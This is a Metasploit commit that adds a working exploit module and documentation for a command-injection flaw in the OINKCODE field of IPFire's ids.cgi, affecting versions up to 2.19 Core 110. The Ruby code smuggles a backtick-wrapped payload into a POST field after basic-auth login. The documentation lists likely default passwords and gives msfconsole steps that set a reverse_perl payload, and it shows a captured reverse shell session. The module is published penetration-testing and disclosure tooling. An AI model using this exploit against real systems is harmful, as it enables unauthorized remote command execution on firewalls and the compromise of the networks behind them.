Land rapid7#8559, Ipfire oinkcode exec

bwatters-r7 · bwatters-r7 · commit ffad0d1bbfd0 · 2017-07-19T14:31:18.000-05:00
diff --git a/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md b/documentation/modules/exploit/linux/http/ipfire_oinkcode_exec.md
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
+
+This module has been verified against:
+
+1. 2.19 core 100
+2. 2.19 core 110 (exploit-db, not metasploit module)
+
+## Verification Steps
+
+  1. Install the firewall
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
+  4. Do: ```set password admin``` or whatever it was set to at install
+  5. Do: ```set rhost 10.10.10.10```
+  6. Do: ```set payload cmd/unix/reverse_perl```
+  7. Do: ```set lhost 192.168.2.229```
+  8. Do: ```exploit```
+  9. You should get a shell.
+
+## Options
+
+  **PASSWORD**
+
+  Password is set at install.  May be blank, 'admin', or 'ipfire'.
+
+## Scenarios
+
+  ```
+    msf > use exploit/linux/http/ipfire_oinkcode_exec 
+    msf exploit(ipfire_oinkcode_exec) > set password admin
+    password => admin
+    msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
+    rhost => 192.168.2.201
+    msf exploit(ipfire_oinkcode_exec) > set verbose true
+    verbose => true
+    msf exploit(ipfire_oinkcode_exec) > check
+    [*] 192.168.2.201:444 The target appears to be vulnerable.
+    msf exploit(ipfire_oinkcode_exec) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
+    id
+    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
+    whoami
+    nobody
+  ```
diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -0,0 +1,119 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'IPFire proxy.cgi RCE',
+        'Description' => %q(
+          IPFire, a free linux based open source firewall distribution,
+          version < 2.19 Update Core 110 contains a remote command execution
+          vulnerability in the ids.cgi page in the OINKCODE field.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # module
+            '0x09AL'                         # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '42149' ]
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Arch'           => [ ARCH_CMD ],
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl awk openssl'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Jun 09 2017'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ]
+    )
+  end
+
+  def check
+    begin
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
+      res = send_request_cgi(
+        'uri'           => '/cgi-bin/pakfire.cgi',
+        'method'        => 'GET',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+      )
+
+      if res && res.code == 200
+        /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+      end
+      if version.nil? || update.nil? || !Gem::Version.correct?(version)
+        vprint_error('No Recognizable Version Found')
+        CheckCode::Safe
+      elsif Gem::Version.new(version) <= Gem::Version.new('2.19') && update.to_i <= 110
+        CheckCode::Appears
+      else
+        vprint_error('Version and/or Update Not Supported')
+        CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      print_error("Connection Failed")
+      CheckCode::Safe
+    end
+  end
+
+  def exploit
+    begin
+      # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
+      # after a chat with @bcoles in IRC.
+      vprint_status('Sending request')
+      res = send_request_cgi(
+        'uri'           => '/cgi-bin/ids.cgi',
+        'method'        => 'POST',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+        'headers'       =>
+          {
+            'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+          },
+        'vars_post'          => {
+          'ENABLE_SNORT_GREEN' => 'on',
+          'ENABLE_SNORT' => 'on',
+          'RULES' => 'registered',
+          'OINKCODE' => "`#{payload.encoded}`",
+          'ACTION' => 'Download new ruleset',
+          'ACTION2' => 'snort'
+          }
+      )
+
+      # success means we hang our session, and wont get back a response, so just check we get a response back
+      if res && res.code != 200
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end
